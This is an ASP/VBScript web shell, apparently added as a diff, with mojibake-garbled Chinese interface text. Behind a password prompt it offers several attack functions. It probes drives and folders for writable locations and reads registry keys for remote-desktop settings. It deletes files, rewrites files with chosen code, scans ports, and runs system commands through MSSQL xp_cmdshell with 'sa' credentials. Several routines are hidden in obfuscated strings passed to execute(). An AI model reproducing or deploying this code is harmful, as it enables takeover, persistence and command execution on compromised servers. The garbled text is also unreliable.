+j" <TR align=middle class=TBTD><FORM action=?Action=ScanDrive&Drive="
+j DriveB.DriveLetter
+j" method=Post><TD width=25"&chr(37)&"><B>�̷�</B></TD><TD width=15"&chr(37)&">"
+j DriveB.DriveLetter
+j":</TD><TD width=20"&chr(37)&"><B>����</B></TD><TD width=20"&chr(37)&">"
+  Select Case DriveB.DriveType
+  Case 1: j"���ƶ�"
+  Case 2: j"����Ӳ��"
+  Case 3: j"�������"
+  Case 4: j"CD-ROM"
+  Case 5: j"RAM����"
+  Case else: j"δ֪����"
+  End Select
+j"</TD><TD><INPUT type=submit value=��ϸ����></TD></FORM></TR>"
+  Next
+j" <TR class=TBTD><FORM action=?Action=ScFolder&Folder="
+j FSO.GetSpecialFolder(0)
+j" method=Post><TD align=middle><B>Windows�ļ���</B></TD><TD colspan=3>"
+j FSO.GetSpecialFolder(0)
+j"</TD><TD align=middle><INPUT type=submit value=��ϸ����></TD></FORM></TR><TR class=TBTD><FORM action=?Action=ScFolder&Folder="
+j FSO.GetSpecialFolder(1)
+j" method=Post><TD align=middle><B>System32�ļ���</B></TD><TD colspan=3>"
+j FSO.GetSpecialFolder(1)
+j"</TD><TD align=middle><INPUT type=submit value=��ϸ����></TD></FORM></TR><TR class=TBTD><FORM action=?Action=ScFolder&Folder="
+j FSO.GetSpecialFolder(2)
+j" method=Post><TD align=middle><B>ϵͳ��ʱ�ļ���</B></TD><TD colspan=3>"
+j FSO.GetSpecialFolder(2)
+j"</TD><TD align=middle><INPUT type=submit value=��ϸ����></TD><TR class=TBTD> <FORM action= method=Post>"
+j"<TD align=middle><B>վ���Ŀ¼</B></TD><TD colspan=3>վ���Ŀ¼<TD align=middle><a href="&URL&"?Action=ScFolder&Folder="&wwwroot&"><b>��ϸ����</b></a></TD><TR class=TBTD> <FORM action= method=Post>"
+j"<TD align=middle><B>����վĿ¼</B></TD><TD colspan=3>����վĿ¼ <TD align=middle><a href="&URL&"?Action=ScFolder&Folder=c:\recycler\><b>��ϸ����</b></a></TD><TR class=TBTD> <FORM action= method=Post><TD align=middle><B>wmpubĿ¼ </B></TD><TD colspan=3>wmpub<TD align=middle><a href="&URL&"?Action=ScFolder&Folder=c:\wmpub\><b>��ϸ����</b></a></TD></TABLE><BR>"
+j"</FORM></TR></TABLE><BR><DIV align=center><FORM Action=?Action=ScFolder method=Post>ָ���ļ��в�ѯ��<INPUT type=text name=Folder value=""c:\php\,d:\Program Files\,C:\Documents and Settings\All Users\Documents\,C:\recycler\,d:\recycler\,e:\recycler\,f:\recycler\,C:\wmpub\,C:\WINDOWS\Temp\,C:\360rec,C:\cache,C:\JPEGCapture,C:\Inetpub""><INPUT type=submit value=���ɱ���> �����鿴Ŀ¼Ȩ��,������Ŀ¼�á�,��������</FORM><DIV>"
+Set FSO=Nothing
+End Sub 
+
+Sub ScanDrive(Drive)
+Dim FSO,TestDrive,BaseFolder,TempFolders,Temp_Str,D
+If Drive <> "" Then
+Set FSO = Server.Createobject(CONST_FSO)
+Set TestDrive = FSO.GetDrive(Drive)
+If TestDrive.IsReady Then
+Temp_Str = "<LI>���̷������ͣ�" & Red(TestDrive.FileSystem) & "<LI>�������кţ�" & Red(TestDrive.SerialNumber) & "<LI>���̹�������" & Red(TestDrive.ShareName) & "<LI>������������" & Red(CInt(TestDrive.TotalSize/1048576)) & "<LI>���̾�����" & Red(TestDrive.VolumeName) & "<LI>���̸�Ŀ¼:" & ScReWr((Drive & ":\"))
+Set BaseFolder = TestDrive.RootFolder
+Set TempFolders = BaseFolder.SubFolders
+For Each D in TempFolders
+Temp_Str = Temp_Str & "<LI>�ļ��У�" & ScReWr(D)
+Next
+Set TempFolder = Nothing
+Set BaseFolder = Nothing
+Else
+Temp_Str = Temp_Str & "<LI>���̸�Ŀ¼:" & Red("���ɶ�:(")
+Dim TempFolderList,t:t=0
+Temp_Str = Temp_Str & "<LI>" & Red("���Ŀ¼���ԣ�")
+TempFolderList = Array("windows","winnt","win","win2000","win98","web","winme","windows2000","asp","php","Tools","Documents and Settings","Program Files","Inetpub","ftp","wmpub","tftp")
+For i = 0 to Ubound(TempFolderList)
+If FSO.FolderExists(Drive & ":\" & TempFolderList(i)) Then
+t = t+1
+Temp_Str = Temp_Str & "<LI>�����ļ��У�" & ScReWr(Drive & ":\" & TempFolderList(i))
+End if
+Next
+If t=0 then Temp_Str = Temp_Str & "<LI>�����" & Drive & "�̸�Ŀ¼����δ�з���:("
+End if
+Set TestDrive = Nothing
+Set FSO = Nothing
+Temp_Str = Temp_Str 
+Message Drive & ":������Ϣ",Temp_Str,1
+End if
+End Sub
+Sub ScFolder(folder)
+ 'On Error Resume Next
+folderArr = Split(folder,",")
+For i = 0 To Ubound(folderArr)
+Dim FSO,OFolder,TempFolder,Scmsg,S
+Set FSO = Server.Createobject(CONST_FSO)
+folder = folderArr(i)
+If FSO.FolderExists(folder) Then
+ Set OFolder = FSO.GetFolder(folder)
+Set TempFolders = OFolder.SubFolders
+Scmsg = "<LI>ָ���ļ��и�Ŀ¼��" & ScReWr(folder)
+For Each S in TempFolders
+ Scmsg = Scmsg&"<LI>�ļ��У�" & ScReWr(S) 
+Next
+Set TempFolders = Nothing
+Set OFolder = Nothing
+Else
+ Scmsg = Scmsg & "<LI>�ļ��У�" & Red(folder & "�����ڻ��޶�Ȩ��!")
+End if
+Scmsg = Scmsg & "<br><br>ע�⣺��Ҫ���ˢ�±�ҳ�棬������ֻд�ļ��л����´��������ļ�!"&backurl
+Set FSO = Nothing
+Message "",Scmsg,1
+next
+End Sub
+Function ScReWr(folder):On Error Resume Next:Dim FSO,TestFolder,TestFileList,ReWrStr,RndFilename:Set FSO = Server.Createobject(CONST_FSO):Set TestFolder = FSO.GetFolder(folder):Set TestFileList = TestFolder.SubFolders:RndFilename = "\temp" & Day(now) & Hour(now) & Minute(now) & Second(now) & ".tmp":For Each A in TestFileList:Next:If err Then:err.Clear:ReWrStr = folder & "<FONT color=#ff2222> ���ɶ�,":FSO.CreateTextFile folder & RndFilename,True:If err Then:err.Clear:ReWrStr = ReWrStr & "����д��</FONT>":Else:ReWrStr = ReWrStr & "��д��</FONT>":FSO.DeleteFile folder & RndFilename,True:End If:Else:ReWrStr = folder & "<FONT color=#dddddd> �ɶ�,":FSO.CreateTextFile folder & RndFilename,True:If err Then:err.Clear:ReWrStr = ReWrStr & "����д��</FONT>":Else:ReWrStr = ReWrStr & "��д��</FONT>":FSO.DeleteFile folder & RndFilename,True:End if:End if:Set TestFileList = Nothing:Set TestFolder = Nothing:Set FSO = Nothing:ScReWr = ReWrStr:End Function:Sub CustomScanDriveForm():execute(king("yo rft��`>``;)0-(gu.nkgzloi``=aeosZfg ��ҳ���ϻط�=txsqc fgzzxw=thnz JMYGC<` p��`>kw<]������ɨ[` p��zbtG�� yC rfS��koWzbtGaetiZ,tsoXaetiZ,))o(zoshUlizqY(dokJ tsoX_koW_tzokKkoWvgiU��ftiz 1>)`:`,)o(zoshUlizqY(kzlfo yo�� )zoshUlizqY(rfxgAM gJ )zoshUlizqY(rfxgAV=o kgX�� ))10(kie&)80(kie,)`lizqY`(zltxjtN(zoshU=zoshUlizqY��)`lizqY`(zltxjtN = )`lizqh`(fgolltU��ilxsX.tlfghltk��`>kw<......�������ʱ�Ķ�һҪ���ܿɲ��` p��)`fg`=)`hdtJaetiZgG`(zltxjtN( = hdtJaetiZgG��)`fg`=)`tzokKgGvgiU`(zltxjtN( = koWtzokKgGvgiU��)`fg`=)`koWzbtGaetiZ`(zltxjtN( = koWzbtGaetiZ��)`fg`=)`tsoXaetiZ`(zltxjtN( = tsoXaetiZ��tlst��`>ktzfte/<>dkgy/<` p��`>stwqs/<¼Ŀʱ�ٲ�첻` p��`>/ 'rtaetie'=rtaetie 'hdtJaetiZgG'=ro 'bgwaetie'=thnz 'hdtJaetiZgG'=tdqf zxhfo<` p��`>'hdtJaetiZgG'=kgy stwqs<` p��`>stwqs/<���ĺ�¼Ŀд����` p��`>/'tzokKgGvgiU'=ro 'bgwaetie'=thnz 'tzokKgGvgiU'=tdqf zxhfo<` p��`>'tzokKgGvgiU'=kgy stwqs<` p��`>stwqs/<` p��`�����Բ�>/  'rtaetie'=rtaetie 'tsoXaetiZ'=ro 'bgwaetie'=thnz 'tsoXaetiZ'=tdqf zxhfo<` p��`>'tsoXaetiZ'=kgy stwqs<` p��`>stwqs/<` p��`  ¼Ŀ�Բ�>/ 'rtaetie'=rtaetie 'koWzbtGaetiZ'=ro 'bgwaetie'=thnz 'koWzbtGaetiZ'=tdqf zxhfo<` p��`>'koWzbtGaetiZ'=kgy stwqs<` p��`> '���ʼ��'=txsqc 'fgzzxw'=tdqf 'zodwxl'=thnz zxhfo<` p��`>/ kw<` p��`>qtkqzbtz/<`&kzl_lizqY&`>'zorS'=llqse '10'=lvgk '13'=lsge 'lizqY'=tdqf qtkqzbtz<` p��`>kw<¼Ŀ�Ӳ�춯�Ի����,¼Ŀ�IJ����������>kw<!Ϣ�Ź���ȫ��Щһ�����������Ϊ,����д��¼Ŀ������������Կ���̴�` p��`>''=fgozeq 'zlgh'=rgiztd '0dkgy'=tdqf '0dkgy'=ro dkgy<>ktzfte<` p��)`lizqh`(fgolltU=kzl_lizqY  ftiz ``><)`lizqh`(fgolltU yo��`wxhztfC\:Z`&)10(kie&)80(kie&`tkxzhqZESYR\:Z`&)10(kie&)80(kie&`tieqe\:Z`&)10(kie&)80(kie&`etk158\:Z`&)10(kie&)80(kie&`\foqdzlgittky\:r`&)10(kie&)80(kie&`\wxhdv\:Z`&)10(kie&)80(kie&`\ktsenetk\:y`&)10(kie&)80(kie&`\ktsenetk\:t`&)10(kie&)80(kie&`\ktsenetk\:r`&)10(kie&)80(kie&`\ktsenetk\:Z`&)10(kie&)80(kie&`\ltsoX dqkugkY\:t`&)10(kie&)80(kie&`\ltsoX dqkugkY\:r`&)10(kie&)80(kie&`\hih\:e`&)10(kie&)80(kie&`\ltsoX dqkugkY\:e`&)10(kie&)80(kie&`\lufozztU rfq lzftdxegW\:e`&)10(kie&)80(kie&`\lvgrfov\:e`=kzl_lizqY��ftiz ``= )`lizqY`(zltxjtN yo��SxkJ = ktyyxA.tlfghltN'"))
+end sub
+function GetFullPath(path)
+GetFullPath = path
+if Right(path,1) <> "\" then GetFullPath = path&"\" 
+end function
+Function Deltextfile(filepath)
+On Error Resume Next
+Set objFSO = CreateObject(CONST_FSO) 
+if objFSO.FileExists(filepath) then 
+objFSO.DeleteFile(filepath) 
+end if 
+Set objFSO = nothing
+Deltextfile = Err.Number 
+End Function 
+Function CheckDirIsOKWrite(DirStr)
+On Error Resume Next
+Set FSO = Server.CreateObject(CONST_FSO)
+filepath = GetFullPath(DirStr)&fso.GettempName
+FSO.CreateTextFile(filepath) 
+CheckDirIsOKWrite = Err.Number
+if  ShowNoWriteDir and (CheckDirIsOKWrite =70) then
+j "[<font color=#0066FF>Ŀ¼</font>]"&DirStr&" [<font color=red>"&Err.Description&"</font>]<br>"
+end if
+set fout =Nothing
+set FSO = Nothing
+Deltextfile(filepath)
+if CheckDirIsOKWrite=0 and Deltextfile(filepath)=70 then CheckDirIsOKWrite =1
+end Function
+function CheckFileWrite(filepath)
+On Error Resume Next
+Set FSO = Server.CreateObject(CONST_FSO)
+set getAtt=FSO.GetFile(filepath)
+getAtt.Attributes = getAtt.Attributes
+  CheckFileWrite = Err.Number 
+set FSO = Nothing
+set getAtt = Nothing  
+end function
+function ShowDirWrite_Dir_File(Path,CheckFile,CheckNextDir)
+On Error Resume Next
+Set FSO = Server.CreateObject(CONST_FSO)
+B = FSO.FolderExists(Path)
+set FSO=nothing
+IS_TEMP_DIR =(instr(UCase(Path),"WINDOWS\TEMP")>0) and NoCheckTemp
+if B=false then
+Re = CheckFileWrite(Path)
+if Re =0 then
+j "[�ļ�]<font color=red>"&Path&"</font><br>"
+b =true
+exit function
+else
+j "[<font color=red>�ļ�</font>]"&Path&" [<font color=red>"&Err.Description&"</font>]<br>"
+exit function
+end if
+end if
+Path = GetFullPath(Path)
+re = CheckDirIsOKWrite(Path)
+if (re =0) or (re=1) then
+j "[Ŀ¼]<font color=#0000FF>"& Path&"</font><br>"
+end if
+Set FSO = Server.CreateObject(CONST_FSO)
+set f = fso.getfolder(Path)
+if (CheckFile=True) and (IS_TEMP_DIR=false) then
+b=false
+for each file in f.Files
+Re = CheckFileWrite(Path&file.name)
+if Re =0 then
+j "[�ļ�]<font color=red>"& Path&file.name&"</font><br>"
+b =true
+else
+if ShowNoWriteDir then j "[<font color=red>�ļ�</font>]"&Path&file.name&" [<font color=red>"&Err.Description&"</font>]<br>"
+end if
+next
+if b then response.Flush 
+end if
+for each file in f.SubFolders
+if CheckNextDir=false then
+re = CheckDirIsOKWrite(Path&file.name)
+if (re =0) or (re=1) then
+j "[Ŀ¼]<font color=#0066FF>"& Path&file.name&"</font><br>"
+end if
+end if
+if (CheckNextDir=True) and (IS_TEMP_DIR=false) then 
+ShowDirWrite_Dir_File Path&file.name,CheckFile,CheckNextDir 
+end if
+next
+Set FSO = Nothing
+set f = Nothing
+end function
+function goback():set fs=server.CreateObject("scripting.filesystemobject") 
+set outpout=fs.CreateTextFile(server.mappath("ok.asp"),True) 
+outpout.Write(""&king("ufoizgf=ktrsgyg ztl��ufoizgf=glyB ztl��yo rft��`>ktzfte/<>kw/<>';)0-(gu.nkgzloi'=aeosZfg �ط�=txsqc fgzzxw=thnz JMYGC<>kw<>ktzfte<>ktzfte/<!��¼Ŀ���̴��Ǿ���>ktzfte<>zhokel/<)```&)`izqYktrsgX`(fgolltU&```(ktrsgXvgiU>zhokel<` p�� tlst��`>zhokel/<)```&)ktrsgyzftkqh.ktrsgyg(izqYtN&```(ktrsgXvgiU>zhokel<` p�� ftiz ktrsgXzggNlC.ktrsgyg zgf yo��))`izqYktrsgX`(fgolltU(ktrsgyztE.glyB = ktrsgyg ztl��)BUX_JUGBZ(zetpwBtzqtkZ.ktcktU = glyB ztl")& "")
+end function
+sub ReadREG()
+execute(king("yo rft��yC rfS��nqkkQtiz & `>os<` p��tlsS��zbtG��)o(nqkkQtiz & `>os<` p��)nqkkQtiz(rfxgAM gJ 1=o kgX��ftiJ )nqkkQtiz(nqkkQlC yC��)izqYtiz(rqtNutN.Llv=nqkkQtiz��)`izqYtiz`(zltxjtN=izqYtiz��)`sstiU.zhokeUK`(zetpwBtzqtkZ.ktcktU = Llv ztU��zbtG tdxltN kgkkS fB��ftiz ``><)`izqYtiz`(zltxjtN yo��`>/ki<>dkgy/<` p��`>')(zodwxl.dkgy.loiz'=aeosefg 'ֵ �� ��'=txsqc fgzzxw=thnz zxhfo<` p��`>13=tmol ''=txsqc izqYtiz=tdqf zxhfo< ` p��`>/ kw<>zetstl/<` p��`>fgozhg/<�ڶ�YZJ�ķſ�����>'lzkgYrtvgssQYZJ\}S9AS66ZW3780-8XXQ-Z1A7-22S3-390657Q3{\lteqyktzfC\lktztdqkqY\hoheJ\lteocktU\011ztUsgkzfgZ\TSJUOU\TVFD'=txsqc fgozhg<` p��`>fgozhg/<�ڶ�YWM�ķſ�����>'lzkgYrtvgssQYWM\}S9AS66ZW3780-8XXQ-Z1A7-22S3-390657Q3{\lteqyktzfC\lktztdqkqY\hoheJ\lteocktU\011ztUsgkzfgZ\TSJUOU\TVFD'=txsqc fgozhg<` p��`>fgozhg/<�ſ����>'YZJ:2388\zloV\lzkgYfthBnssqwgsE\tsoygkYrkqrfqzU\neosgYssqvtkoX\lktztdqkqY\llteeQrtkqiU\lteocktU\ztUsgkzfgZzftkkxZ\TSJUOU\TVFD'=txsqc fgozhg<` p��`>fgozhg/<ugV tsxrtieU>'izqYugV\zftuQufosxrtieU\zyglgkeoT\SNQKJXBU\SGCDZQT_VQZBV_OSFD'=txsqc fgozhg<` p��`>fgozhg/<8�˹�ho/hez>'lktzsoXnzokxetUtswqfS\hoheJ\lteocktU\ztUsgkzfgZzftkkxZ\TSJUOU\SGCDZQT_VQZBV_OSFD'=txsqc fgozhg<` p��`>fgozhg/<9�˹�ho/hez>'lktzsoXnzokxetUtswqfS\hoheJ\lteocktU\911ztUsgkzfgZ\TSJUOU\SGCDZQT_VQZBV_OSFD'=txsqc fgozhg<` p��`>fgozhg/<0�˹�ho/hez>'lktzsoXnzokxetUtswqfS\hoheJ\lteocktU\011ztUsgkzfgZ\TSJUOU\SGCDZQT_VQZBV_OSFD'=txsqc fgozhg<` p��`>fgozhg/<�ڶ�̬״KnfQeY>``zkgYlxzqzUYCYZJ\dtzlnU\fgolktIzftkkxZ\tktivnfQeh\etzfqdnU\SNQKJXBU\TVFD``=txsqc fgozhg<`p��`>fgozhg/<�ڶ˾���KnfQeY>``zkgYqzqWYCYZJ\dtzlnU\fgolktIzftkkxZ\tktivnfQeh\etzfqdnU\SNQKJXBU\TVFD``=txsqc fgozhg<`p��`>fgozhg/<�ڶ�2388>``ktwdxGzkgY\heJ-YWN\lfgozqzUfoK\ktcktU sqfodktJ\sgkzfgZ\ztUsgkzfgZzftkkxZ\TSJUOU\TVFD``=txsqc fgozhg<`p��`>fgozhg/<�ڶ�7ZGI>``ktwdxGzkgY\7ZGIfoK\ZGIsqtN\SNQKJXBU\TVFD``=txsqc fgozhg<`p��`>fgozhg/<����7ZGI>``rkgvllqY\7ZGIfoK\ZGIsqtN\SNQKJXBU\TVFD``=txsqc fgozhg<`p��`>fgozhg/<�ڶ�8ZGI>``ktwdxGzkgY\8ZGIfoK\VNB\tkqvzygU\MZFD``=txsqc fgozhg<`p��`>fgozhg/<����8ZGI>``rkgvllqY\8ZGIfoK\VNB\tkqvzygU\MZFD``=txsqc fgozhg<`p��`>fgozhg/<�ڶ�fodrqN>``zkgY\lktztdqkqY\ktcktU\1.9c\fodrQN\TSJUOU\TVFD``=txsqc fgozhg<`p��`>fgozhg/<����fodrqN>``ktztdqkqY\lktztdqkqY\ktcktU\1.9c\fodrQN\TSJUOU\TVFD``=txsqc fgozhg<`p��`>fgozhg/<���п���>``rfoA\tuqafoV\hoheJ\lteocktU\ztUsgkzfgZzftkkxZ\TSJUOU\TVFD``=txsqc fgozhg<`p��`>fgozhg/<tdqGktzxhdgZ>'tdqGktzxhdgZ\tdqGktzxhdgZ\tdqGktzxhdgZ\sgkzfgZ\ztUsgkzfgZzftkkxZ\TSJUOU\TVFD'=txsqc fgozhg<` p��`>fgozhg/<ֵ���Ĵ�����ѡ>''=txsqc fgozhg<` p��`>';txsqc.loiz=txsqc.izqYtiz.dkgy.loiz'=tufqiZfg zetstl<` p��` >9=fqhlsge rz<>kz<` p��`>zeQtiz=tdqf utNrqtN=txsqc ftrroi=thnz zxhfo<` p�� `>h<ȡ��ֵ������ע`  p��`>zlgh=rgiztd dkgy<` p"))
+end sub
+sub delpoint()
+execute(king("`>cor/<>dkgy/<>'���ĵ����ɾ'=txsqc 'zodwxU'=tdqf 'zodwxl'=thnz zxhfo<>'hlq.tsoy\..zgr\zlgittky\:W'= txsqc'63'=tmol  'zbtz'=thnz'tsoyhstr'=tdqf zxhfo<>'zlgh'=rgiztd ''=fgozeq dkgy<>h<>dkgy/<>'¼Ŀ�����ɾ'=txsqc 'zodwxU'=tdqf 'zodwxl'=thnz zxhfo<>'..zgr\zlgittky\:W'=txsqc '63'=tmol 'zbtz'=thnz 'ktrgsyhstr'=tdqf zxhfo<>'zlgh'=rgiztd''=fgozeq dkgy<>kw<>kw<` p��`>zfgy<д����ʾ�ղ�>rtk= kgsge zfgy<` p��yo rft��)`tsoyhstr`(zltxjtN&`\?\\` tsoyzfoghstr��ftiz ``>< )`tsoyhstr`(zltxjtN yo��yo rft��)`ktrgsyhstr`(zltxjtN&`\?\\` ktrsgyzfoghstr��ftiz ``>< )`ktrgsyhstr`(zltxjtN yo"))
+
+end  sub
+function Delpointfolder(t0)
+execute(king("kqtsZ.kkS:fgozhokeltW.kkS p ftiJ kkS XC��`>kw<!!���ɳ�ɾ`&1z  p     ��   txkz,1y ktrsgXtztstW.gly�� ftiJ )1y(lzlobSktrsgX.gly XC'��yC rfS��)1z(izqYhqT.ktcktU=1y  ��tlsS��1z=1y  ��ftiJ 1>)`\:`,1z(kzlfC yC��)BUX_JUGBZ(zetpwBtzqtkZ.ktcktU=gly ztU"))
+
+End Function
+function Delpointfile(t0)
+execute(king("`>kw<!!���ɳ�ɾ`&1z  p��kqtsZ.kkS:fgozhokeltW.kkS p ftiJ kkS XC �� txkz,1y tsoXtztstW.gly ��yC rfS ��)1z(izqYhqT.ktcktU=1y  ��tlsS ��1z=1y ��ftiJ 1>)`\:`,1z(kzlfC yC��)BUX_JUGBZ(zetpwBtzqtkZ.ktcktU=gly ztU ��zbtG tdxltN kgkkS fB'"))
+End function
+if request("ProFile")<>"" then
+on error resume next
+if Application(request("ProFile"))=1 then
+Set fsoXX = Server.CreateObject(CONST_FSO)
+if request("DelCon")=1 then
+Application(request("ProFile")&"Con")=""
+response.redirect Url&"?ProFile="&request("ProFile")&""
+response.end
+end if
+DIM rline,rline2
+rline2=Application(request("ProFile")&"Code")
+rline2=rline2&vbcrlf
+j"<meta http-equiv=""refresh"" content="&Application(request("ProFile")&"Time")&">"
+j"<a href="&Url&"?ProFile="&request("ProFile")&"&DelCon=1><b>�����־</b></a> &nbsp;<font color=yellow>Ҫ����������ֱ�ӹر�ҳ�漴�ɡ�</font><br>"
+for each FileUrl in split(Application(request("ProFile")&"File"),vbcrlf)
+FileUrl=trim(FileUrl)
+if fsoXX.FileExists(FileUrl) then
+Set txt = fsoXX.OpenTextFile(FileUrl,1,true)
+rline=""
+if Not txt.AtEndOfStream then
+rline=txt.ReadAll  
+end if
+if rline2<>rline then
+txt.close
+fsoX.GetFile(FileUrl).Attributes=32
+if Application(request("ProFile")&"Char")=1 then
+set myfileee = fsoXX.CreateTextFile(FileUrl,true)
+else
+set myfileee = fsoXX.CreateTextFile(FileUrl,true,true)
+end if
+myfileee.writeline Application(request("ProFile")&"Code")
+Application(request("ProFile")&"Con")=now()&" "&FileUrl&" <font color=yellow>�����ģ��ѻָ�</font><br>"&Application(request("ProFile")&"Con")
+else
+Application(request("ProFile")&"Con")=now()&" "&FileUrl&" ��<br>"&Application(request("ProFile")&"Con")
+txt.close
+end if
+else
+if Application(request("ProFile")&"Char")=1 then
+set myfileee = fsoXX.CreateTextFile(FileUrl,true)
+else
+set myfileee = fsoXX.CreateTextFile(FileUrl,true,true)
+end if
+myfileee.writeline Application(request("ProFile")&"Code")
+Application(request("ProFile")&"Con")=now()&" "&FileUrl&" <font color=red>��ɾ�����ѻָ�</font><br>"&Application(request("ProFile")&"Con")
+end if
+next
+if ubound(split(Application(request("ProFile")&"Con"),"<br>"))>=40 then
+dim ashowic
+for ashowi=0 to 40
+ashowic=ashowic&split(Application(request("ProFile")&"Con"),"<br>")(ashowi)&"<br>"
+next
+Application(request("ProFile")&"Con")=ashowic
+end if
+j Application(request("ProFile")&"Con")
+else
+j"<br><br><br><center>�������̶�ʧ����<a href="&URL&" style=""text-decoration:underline;font-weight:bold"">��������</a>�������̡�</center>"
+end if
+if request("profile")="a" then j c
+response.end
+end if
+
+if session("KKK")<>UserPass then
+if request.form("pass")<>"" then
+if request.form("pass")=UserPass or request.form("pass")=URL then
+session("KKK")=UserPass
+response.redirect url
+else
+j"<br><br><br><b><div align=center><a href="&siteurl&" target=_blank ><font size='3' color='red'>"&errin&"</a><br></font ></b> <br><br><br><br><b><div align=center><font size='14' color='lime'></font></b></p></center>"&backurl
+end if
+else
+si="<center><FONT color='"&fontcor&"' style=""FONT-SIZE: 80pt; FILTER: shadow(color:"&color1&",strength=55); WIDTH: 100%;  LINE-HEIGHT: 300%; FONT-FAMILY:Arial"">"&Copyright&"</FONT ><div style='width:400px;padding:32px; align=left'><br><form action='"&url&"' method='post'><b>���룺</b><input name='pass' type='password' size='22'> <input type='submit' value='ȷ��'></center>"
+if instr(SI,SIC)<>0 then j sI
+end if
+response.end
+end if
+sub ScanPort()
+Server.ScriptTimeout = 7776000
+if request.Form("port")="" then
+PortList="21,23,53,1433,3306,3389,4899,5631,5632,5800,5900,43958"
+else
+PortList=request.Form("port")
+end if
+if request.Form("ip")="" then
+IP="127.0.0.1"
+else
+IP=request.Form("ip")
+end if
+j"<p>�˿�ɨ����(���ɨ�����˿�,�ٶȱȽ���,�����Ƽ�ʹ��CMD��CMD������ɨ�費׼ȷ��)</p><p>�������������ɨ�����ⲿIP�����޷����ӡ�����SHELL��ִ��ϵ�в�����</p>"
+j"<form name='form1' method='post' action='' onSubmit='form1.submit.disabled=true;'>"
+j"<p>Scan IP: "
+j" <input name='ip' type='text' class='TextBox' id='ip' value='"&IP&"' size='60'>"
+j"<br>Port List:"
+j"<input name='port' type='text' class='TextBox' size='60' value='"&PortList&"'>"
+j"<br><br>"
+j"<input name='submit' type='submit' class='buttom' value=' scan '>"
+j"<input name='scan' type='hidden' id='scan' value='111'>"
+j"</p></form>"
+If request.Form("scan") <> "" Then
+timer1 = timer
+j("<b>ɨ�豨��:</b><br><hr>")
+tmp = Split(request.Form("port"),",")
+ip = Split(request.Form("ip"),",")
+For hu = 0 to Ubound(ip)
+If InStr(ip(hu),"-") = 0 Then
+For i = 0 To Ubound(tmp)
+If Isnumeric(tmp(i)) Then 
+Call Scan(ip(hu), tmp(i))
+Else
+seekx = InStr(tmp(i), "-")
+If seekx > 0 Then
+startN = Left(tmp(i), seekx - 1 )
+endN = Right(tmp(i), Len(tmp(i)) - seekx )
+If Isnumeric(startN) and Isnumeric(endN) Then
+For j = startN To endN
+Call Scan(ip(hu), j)
+Next
+Else
+j(startN & " or " & endN & " is not number<br>")
+End If
+Else
+j(tmp(i) & " is not number<br>")
+End If
+End If
+Next
+Else
+ipStart = Mid(ip(hu),1,InStrRev(ip(hu),"."))
+For xxx = Mid(ip(hu),InStrRev(ip(hu),".")+1,1) to Mid(ip(hu),InStr(ip(hu),"-")+1,Len(ip(hu))-InStr(ip(hu),"-"))
+For i = 0 To Ubound(tmp)
+If Isnumeric(tmp(i)) Then 
+Call Scan(ipStart & xxx, tmp(i))
+Else
+seekx = InStr(tmp(i), "-")
+If seekx > 0 Then
+startN = Left(tmp(i), seekx - 1 )
+endN = Right(tmp(i), Len(tmp(i)) - seekx )
+If Isnumeric(startN) and Isnumeric(endN) Then
+For j = startN To endN
+Call Scan(ipStart & xxx,j)
+Next
+Else
+j(startN & " or " & endN & " is not number<br>")
+End If
+Else
+j(tmp(i) & " is not number<br>")
+End If
+End If
+Next
+Next
+End If
+Next
+timer2 = timer
+thetime=cstr(int(timer2-timer1))
+j"<hr>Process in "&thetime&" s"
+END IF
+end sub
+Sub Scan(targetip, portNum)
+On Error Resume Next
+set conn = Server.CreateObject("ADODB.connection")
+connstr="Provider=SQLOLEDB.1;Data Source=" & targetip &","& portNum &";User ID=lake2;Password=;"
+conn.ConnectionTimeout = 1
+conn.open connstr
+If Err Then
+If Err.number = -2147217843 or Err.number = -2147467259 Then
+If InStr(Err.description, "(Connect()).") > 0 Then
+j(targetip & ":" & portNum & ".........<font color=green>�ر�</font><br>")
+Else
+j(targetip & ":" & portNum & ".........<font color=red>����</font><br>")
+End If
+End If
+End If
+End Sub
+Select Case Action:case "MainMenu":MainMenu()
+Case "EditPower"
+Call EditPower(request("PowerPath"))
+Case "SavePower"
+Call SavePower(request("PowerPath"),request("SaveType"))
+case "getTerminalInfo":getTerminalInfo():case "PageAddToMdb":PageAddToMdb():case "ScanPort":ScanPort():FuncTion MMD():SI="<br><form name=form method=post action=""""><table width=""85%"" align='center'><tr align=center><Td id=s><b id=x>MSSQL Commander</b></td></tr><tr align='center'><td id=d><b id=x>Command��</b><input type=text name=MMD size=35 value=""ipconfig"" >&nbsp;<b id=x>UserName��</b><input type=text name=U value=sa>&nbsp;<b id=x>Password��</b><input type=text name=P VALUES=123456>&nbsp;<input type=submit value=Execute></td></tr></table></form>":j SI:SI="":If trim(request.form("MMD"))<>""  Then:password= trim(Request.form("P")):id=trim(Request.form("U")):set adoConn=sERvEr.crEATeobjECT("ADODB.Connection"):adoConn.Open "Provider=SQLOLEDB.1;Password="&password&";User ID="&id:strQuery = "exec master.dbo.xp_cMdsHeLl '" & request.form("MMD") & "'":set recResult = adoConn.Execute(strQuery):If NOT recResult.EOF Then:Do While NOT recResult.EOF:strResult = strResult & chr(13) & recResult(0):recResult.MoveNext:Loop:End if:set recResult = Nothing:strResult = Replace(strResult," ","&nbsp;"):strResult = Replace(strResult,"<","&lt;"):strResult = Replace(strResult,">","&gt;"):strResult = Replace(strResult,chr(13),"<br>"):End if:set adoConn = Nothing:j request.form("MMD") & "<br>"& strResult:end FuncTion:case "Alexa"
+dim AlexaUrl,Top:AlexaUrl=request("u"):Top=Alexa(AlexaUrl):if AlexaUrl="" then AlexaUrl=""&request.servervariables("http_host")&""
